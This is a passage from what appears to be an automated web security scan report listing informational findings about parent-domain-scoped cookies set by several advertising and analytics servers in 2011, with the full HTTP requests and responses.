Set-Cookie: rb=0:779045:20861280:17608843913132534:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:37:40 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
16.20. http://ads.adbrite.com/adserver/vdi/806205  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:39:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://d.chango.com/m/s/AdBrite?partner_uid=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY7bvluBgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:39:13 GMT
Set-Cookie: rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:39:13 GMT
Content-Length: 0

16.21. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794248&zs=3330305f323530&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRCd87L6CRi9rqrOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EL3WyKMKGL2uqs4TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Set-Cookie: ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:25 GMT
Set-Cookie: vsd=0@4@4dbe1561@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:22:25 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjqld%2C826ke%2C1uo0%7Clkjpsr"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:25 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:25 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:25 GMT
Content-Length: 3164

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'fcfaf3';
var AdBrite_Border_Color_Default = 'fcfaf3';
var AdBrite_URL_Col
...[SNIP]...
16.22. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794251&br=1&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=520&zy=233&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:19:49 GMT
Set-Cookie: vsd=0@1@4dbe14c5@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:19:49 GMT
Set-Cookie: fq="84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjqh1%2C826ke%2C1uo0%7Clkjqh1"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:19:49 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:19:49 GMT
Content-Length: 4307

document.write('<a class=\"adHeadline\" target=\"_top\" onmouseover=\"window.status=\'http://www.cheapezfast.com\'; return true;\" onmouseout=\"window.status=\' \'; return true;\" href=\"http://click.
...[SNIP]...
16.23. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1794251&br=1&ifr=1&ref=about%3Ablank&zx=57&zy=158&ww=0&wh=0&fl=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads2.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 02:35:06 GMT
Set-Cookie: b="%3A%3A12ggb"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:35:06 GMT
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 03-May-2011 02:35:06 GMT
Set-Cookie: rb2=EAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:35:06 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMnMzawxrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:35:06 GMT
Set-Cookie: fq="876fb%2C1uo0%7Clkjr6i"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:35:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:35:06 GMT
Content-Length: 1630

document.write('<a class=\"adHeadline\" target=\"_top\" onmouseover=\"window.status=\'http://new-electronic-cigarette.com/ab.php\'; return true;\" onmouseout=\"window.status=\' \'; return true;\" href
...[SNIP]...
16.24. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3005617&rn=709336356&c7=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&c8=Washington%20DC%20Area%20Jobs%20%26%20Careers%3A%20Find%20Your%2&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 01 May 2011 23:34:41 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 30-Apr-2013 23:34:41 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

16.25. http://bdv.bidvertiser.com/bidvertiser.dbm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bdv.bidvertiser.com
Path:   /bidvertiser.dbm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bidvertiser.dbm?pid=349166&bid=862453&RD=89&DIF=2&bd_ref_v=&tref=1&win_name=null&docref=&jsrand=24578&js1loc=about%3Ablank HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bdv.bidvertiser.com

Response

HTTP/1.1 200 OK
Date: Monday, 02-May-2011 02:34:42 GMT
Cache-Control: no-store
Last-Modified: Sunday, 02-May-2010 02:34:42 GMT
Set-Cookie: bdv_c5p=214590_41999682_1; domain=.bidvertiser.com; path=/; expires=Tue, 03-May-2011 02:34:42 GMT
Set-Cookie: fre5_krp=214590_41999682_1; domain=.bidvertiser.com; path=/; expires=Mon, 09-May-2011 02:34:42 GMT
P3P: policyref="http://www.bidvertiser.com/bdv/bidvertiser/p3p.xml", CP="NOI DEV PSA PSD IVA OTP OUR OTR IND OTC"
Content-Type: text/html; charset=ISO-8859-1
Content-Len: 384
Warning: 214 "Juniper Networks DX Active"
Vary: Accept-Encoding, User-Agent
Content-Length: 384

var PUC="http://www.hyperpromote.com/tags/showaon.html?bvgeocode=US&bvlocationcode=862453&bvurl=" + encodeURI(document.location) + "&bvtitle=" + escape(document.title);
var bv_freq=21600;
var temp_s
...[SNIP]...
16.26. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530741&ev=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=3w3v1p&rurl=http%3A%2F%2Fa.triggit.com%2Fpxcwcm HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 26-Apr-2012 02:01:51 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 01-May-2012 02:01:51 GMT; Path=/
Location: http://a.triggit.com/pxcwcm
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 02 May 2011 02:01:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

16.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&64cd0da313&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=64cd0da313__r_id=85dbdb9e09296233a4d7b328928878f8__r_ts=lkjpfk__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; A3=iQQIaFx503Dk00000iKhqaHW208A300001jj9MaH17066N00001iZLfaFB607pd00001j0InaHlY09sO00001j4HbaE.a0a9y00001jGDhaHW50d8900000jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003jGDjaHWf0d8900000hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002jGaZaHWf0d8900004johvaFxN07uh00002h52YaGZy0ca700001hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWe07aw00001jFY.aHqe0d8900001j2VdaGyd07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001jv+zaH1o0d8900002jFZhaHWf0d8900000jAtnaHq602WG00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=9yE10000000000up7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh85Yh0000000001un9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj9yMi0000000000up8Wi10000000001un93M20000000001uf82Np0000000001um9ufH0000000002um99ex0000000001um9yMk0000000000up9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud8Zxy0000000001up9qqo0000000002ui9yDd0000000001un78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh9xwn0000000004up7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000j0InaHlY09sO00001iZLfaFB607pd00001jj9MaH17066N00001iKhqaHW208A300001jGDhaHW50d8900000j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000jGDjaHWf0d8900000gY2paFS+09nl00003hH4jaFhv09wy00001hEIkaItM0bI400001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000jGaZaHWf0d8900004h52YaGZy0ca700001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWe07aw00001jeoLaF6J07Hs00001jFY.aHqe0d8900001j8QYaEBz07LU00001j2VdaGyd07aw00001jv+zaH1o0d8900002hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001jAtnaHq602WG00001jFZhaHWf0d8900000; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9yE10000000000up8Dka0000000001uh9cTR0000000001uf85Yh0000000001un52BU0000000001ui9abz0000000000ui9yMi0000000000up9eB50000000001uj8TfJ0000000001uh9fJa0000000001ul8ny40000000001uq9ufH0000000002um82Np0000000001um93M20000000001uf8Wi10000000001un9yMk0000000000up99ex0000000001um9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9yDd0000000001un9qqo0000000002ui8Zxy0000000001up9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui9xwn0000000004up; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 1831

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
16.28. http://c.bing.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

